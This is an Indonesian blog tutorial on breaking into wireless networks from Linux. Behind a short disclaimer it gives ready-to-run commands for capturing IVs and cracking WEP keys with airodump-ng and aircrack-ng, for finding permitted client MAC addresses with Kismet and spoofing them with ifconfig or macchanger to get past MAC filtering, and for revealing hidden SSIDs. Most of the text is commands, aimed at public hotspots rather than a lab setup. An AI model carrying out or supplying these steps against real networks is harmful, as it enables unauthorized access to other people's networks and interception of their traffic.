Wireless Hacking di Linux


Informasi dan Pengetahuan yang terkandung disini diperuntukan sebagai pembelajaran semata.

Bukan untuk digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang
melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berhadapan
sendiri dengan aparat penegak hukum.

Ada tiga (3) objektif / tujuan teknik yang akan di terangkan disini, yaitu,

Teknik membobol WEP
Teknik membobol MAC filter.
Teknik melihat Hidden SSID

Asumsi

Chipset Wireless yang digunakan adalah Intel, seperti, ipw2200. Kalau anda cukup beruntung
menggunakan chipset Atheros anda dapat melakukan hal-hal yang lebih dahsyat.

Aplikasi yang perlu disiapkan.

Beberapa paket software yang dibutuhkan

# apt-get install gcc g++ linux-kernel-headers libpcap0.8 libpcap0.8-dev \
libnet1 libnet1-dev libdnet libdnet-dev subversion python2.4 \
python2.4-dev python-pyx python-crypto python-psyco dhcp3-server \
bind9 apache2

Install beberapa aplikasi yang lebih fokus untuk hacking wireless

# apt-get install kismet scapy macchanger ettercap dsniff aircrack-ng
Scanning Hotspot
Scanning Keberadaan HotSpot dapat dilakukan menggunakan text mode.
iwlist


Cara yang paling sederhana adalah menggunakan perintah
# iwlist scanning

Kismet

cara yang lebih rumit menggunakan kismet
# apt-get install kismet
# vi /etc/kismet/kismet.conf

source=none,none,addme --> source=ipw3945,wlan0,ipwsource
source=none,none,addme --> source=zd1211,eth1,zysource

Baca http://www.kismetwireless.net/documentation.shtml untuk melihat source yang dikenali Kismet

# kismet

airodump

Mematikan mode monitor di WLAN interface eth1

# airmon-ng stop eth1

Mengaktifkan mode monitor di WLAN interface eth1
# airmon-ng start eth1

Scanning melalui WLAN interface eth1
# airodump-ng eth1


Menjebol WEP menggunakan airodump dan aircrack

Bagian yang lumayan membuat pusing kepala adalah teknik untuk menjebol WEP. Teknik berikut ini
membutuhkan traffic paket yang sangat besar, biasanya akan mudah dilakukan jika ada yang sedang
melakukan transfer file di jaringan HotSpot. Jika tidak ada traffic sama sekali, sampai kapanpun akan
susah untuk di crack WEP-nya.

Kita perlu mencatat tiga (3) hal, yaitu,

(1) BSSID / MAC Addresss AP
(2) MAC address WLAN kita
(3) Channel yang digunakan AP.

Misalnya,

1.BSSID 00:30:4F:4E:2B:50
2.WIFI 00:11:6b:33:d3:90
3.CHANNEL 2

Untuk memudahkan operasi ada baiknya melakukan

# export AP=00:30:4F:4E:2B:50
# export WIFI=00:11:6b:33:d3:90
# export CHANNEL=1


Jalankan airodump di WLAN eth1

# airodump-ng --ivs -w hasilcapture --bssid $AP --channel $CHANNEL eth1

Jalankan aircrack untuk mengcrack WEP

# aircrack-ng -a 1 -e essidapyangakandicrack -n 64 hasilcapture-01.ivs

Anda akan membutuhkan banyak IVS, pastikan traffic cukup tinggi. Hal ini akan mudah jika ada yang
sedang transfer file di jaringan HotSpot.



Melewati Pembatasan Mac Address


Sebagian AP akan memfilter MAC address client. Teknik menemukan MAC address client yang diijinkan lewat oleh AP menggunakan Kismet adalah

# kismet

Lakukan space

S - untuk men-sort
S - untuk men-sort terhadap SSID

Panah Bawah - Letakan di SSID AP yang kita inginkan.

ENTER - detail AP

C - lihat siapa saja & MAC address client AP tersebut

Pastikan airmon tidak aktif di WLAN eth1

# airmon-ng stop eth1


Untuk mengubah MAC address dari WLAN di eth1 menjadi sama dengan MAC address client yang diijinkan AP

# ifconfig eth1 down
# ifconfig eth1 hw ether 00:16:CF:C1:FA:F5
# ifconfig eth1 up

Alternatif lain

# ifconfig eth1 down
# macchanger -mac 00:16:CF:C1:FA:F5 eth1
# ifconfig eth1 up

atau untuk random MAC address

# macchanger -r eth1



Menemukan Hidden SSID


Cara yang paling ampuh untuk menemukan Hidden SSID adalah menggunakan kismet

# kismet

Hidden SSID akan berwarna biru dan di tutup oleh tanda <>.

---------------------------,end, ---------------------------

0 komentar:

Posting Komentar